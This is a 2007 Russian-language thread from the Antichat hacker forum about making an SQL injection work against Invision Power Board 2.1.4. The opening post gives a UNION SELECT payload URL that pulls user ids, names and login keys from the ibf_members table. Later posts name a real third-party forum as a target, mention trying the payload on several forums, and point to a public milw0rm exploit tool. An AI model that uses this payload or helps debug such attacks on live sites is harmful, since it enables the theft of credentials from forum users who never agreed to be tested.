Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

26.03.2007, 18:18
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме: 60100
Репутация:
9
|
|
Вопрос по Ipb
Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
PHP код:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/*
выдает цитату на 58 пост.
И все.
Префикс ibf_ (точно! проверено =))) )
В чем может быть трабла?
|
|
|

26.03.2007, 19:32
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Сообщение от AlexCRC
Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
PHP код:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20WHERE%20id=1%20/*
Думаю оффтоп, но все-таки скажу в конце ссылки /* нету...
|
|
|

26.03.2007, 19:36
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме: 60100
Репутация:
9
|
|
То я видимо часть не скопировал. она эсть.
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666 ) union select 1,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(5 8),member_login_key),1,1,1,1,1,1,1,1,1 from ibf_members WHERE id=1 /*
|
|
|

26.03.2007, 19:38
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме: 7561206
Репутация:
1861
|
|
Кинь ссылку в ПМ, посмотрю что можно сделать...
|
|
|

26.03.2007, 20:07
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме: 60100
Репутация:
9
|
|
Проверил на другом форуме - тоже самое :'(
и еще на одном 
Последний раз редактировалось AlexCRC; 26.03.2007 в 20:11..
|
|
|

27.03.2007, 17:04
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме: 60100
Репутация:
9
|
|
идей нет? 
|
|
|

27.03.2007, 19:04
|
|
Новичок
Регистрация: 17.03.2007
Сообщений: 25
Провел на форуме: 94731
Репутация:
1
|
|
дай ссылку на какой-нить форум!
|
|
|

27.03.2007, 19:18
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме: 60100
Репутация:
9
|
|
к примеру http://www.gameforums.jino-net.ru
|
|
|

27.03.2007, 19:43
|
|
Новичок
Регистрация: 17.03.2007
Сообщений: 25
Провел на форуме: 94731
Репутация:
1
|
|
_ttp://www.milw0rm.com/exploits/2010
сполит с гуи канает на том  просто лень инъекцию мутить 
|
|
|

27.03.2007, 21:40
|
|
Познающий
Регистрация: 11.10.2006
Сообщений: 35
Провел на форуме: 60100
Репутация:
9
|
|
А как с ним работать?
Пишет что форум уязвим.
При попытке узнать префикс - ошибка. но префикс то ibf_
При нажатии "Get data from database" все время получаю разные хеши. В чем дело?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|